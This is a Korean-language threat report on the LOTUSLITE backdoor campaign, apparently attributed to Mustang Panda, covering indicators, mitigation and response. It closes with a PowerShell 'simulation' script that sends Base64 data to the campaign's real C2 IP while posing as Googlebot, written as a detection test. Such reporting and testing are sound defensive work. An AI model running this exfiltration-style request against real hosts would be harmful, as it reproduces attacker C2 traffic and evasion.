LOTUSLITE 캠페인: 지정학적 내러티브에 의해 주도되는 표적형 첩보 활동

요약

Acronis TRU는 미국 정부 조직을 대상으로 한 스파이 활동을 관찰했으며, 이 작업은 악성 DLL 백도어, LOTUSLITE가 담긴 정치적 주제의 ZIP 아카이브를 배포했습니다. 동반 로더 실행 파일이 DLL을 사이드로드한 후 백도어는 Googlebot 사용자 에이전트를 가장하여 HTTPS를 통해 하드코딩된 C2 엔드포인트로 비콘을 보냅니다. 운영자들은 전용 ProgramData 디렉터리를 생성하고, Run 레지스트리 항목을 추가하여 지속성을 확립했습니다. 겹치는 작전 기법을 바탕으로 이 활동은 Mustang Panda와 연결되었습니다.

조사

분석가들은 ZIP을 압축 해제하여 로더 바이너리(Maduro to be taken to New York.exe)를 식별하였고, 무기화된 DLL(kugou.dll)을 함께 확인했습니다. 분석은 DLL 사이드로딩 흐름, 비콘 행동, 뮤텍스 사용, 호스트에 생성된 정확한 지속성 아티팩트를 문서화했습니다. 인프라 검토는 단일 IP(172.81.60.97)와 Phoenix, Arizona에 호스팅된 것으로 보고된 spryt.net 도메인으로 커뮤니케이션을 귀속시켰습니다. Mustang Panda로의 귀속은 공유되는 전술 및 인프라 패턴으로 인해 중간 수준의 신뢰도로 평가되었습니다.

완화

Acronis 검출은 악성 바이너리에 대한 SHA-256 해시에 의존하며 특정 ProgramData 지속성 폴더와 Run 키 위치를 강조했습니다. 네트워크 제어는 Googlebot 사용자 에이전트 문자열로 조합된 경우 식별된 IP/도메인으로의 아웃바운드 HTTPS 연결을 플래그해야 합니다. ProgramData에서 알 수 없는 바이너리 실행을 방지하고 식별 시 관련된 Run 레지스트리 항목을 제거하여 지속성을 줄이십시오.

대응

영향을 받은 엔드포인트를 즉시 격리하고 휘발성 데이터를 캡처하며 분석을 위해 악성 바이너리를 보존하십시오. 생성된 ProgramData 폴더를 제거하고 대응하는 Run 레지스트리 값을 삭제하여 지속성을 차단하십시오. C2 IP와 도메인에 대한 연결성을 차단하고 제공된 파일 해시와 뮤텍스 지표로 엔드포인트 탐지를 업데이트하십시오. 마지막으로 동일한 로더와 DLL 서명을 보이는 추가 호스트에 대한 환경 전반의 수색을 수행하십시오.

시뮬레이션 실행

전제조건: Telemetry & Baseline 사전 점검이 통과해야 합니다.

합리성: 이 섹션은 탐지 규칙을 촉발하도록 설계된 공격자 기술(TTP)의 구체적인 실행을 설명합니다. 명령어와 내러티브는 식별된 TTP를 직접 반영해야 하며 탐지 로직이 예상하는 정확한 텔레메트리를 생성하는 것을 목표로 해야 합니다.

• 공격 내러티브 및 명령어:
  공격자가 워크스테이션을 손상시키고 LOTUSLITE 백도어를 설치했습니다. 합법적인 웹 크롤러 트래픽에 융화하여 데이터를 유출하기 위해 백도어는 하드 코딩된 C2 서버로 HTTP POST를 발행합니다 172.81.60.97. 이는 명시적으로 User‑Agent 헤더를 “Googlebot”으로 설정하여 검색 엔진 크롤러로 가장하여 그러한 에이전트를 허용하는 경계 방어를 피해가려 합니다. 페이로드에는 Base64로 인코딩된 유출 데이터가 포함되어 있습니다.

• 회귀 테스트 스크립트:

  # LOTUSLITE C2 시뮬레이션 – powershell
  $c2 = "http://172.81.60.97/receive"
  $ua = "Googlebot"
  $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload"))
  $body = @{ "data" = $data }
  
  try {
      Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
      Write-Host "C2 request sent successfully."
  } catch {
      Write-Error "C2 request failed: $_"
  }

• 정리 명령:

  # 임시 파일이나 남은 네트워크 연결 제거
  Remove-Item -Path "$env:TEMPlotuslite_temp*" -ErrorAction SilentlyContinue
  # (이번 시뮬레이션에서는 영구적인 서비스가 생성되지 않았습니다)
  Write-Host "정리 완료."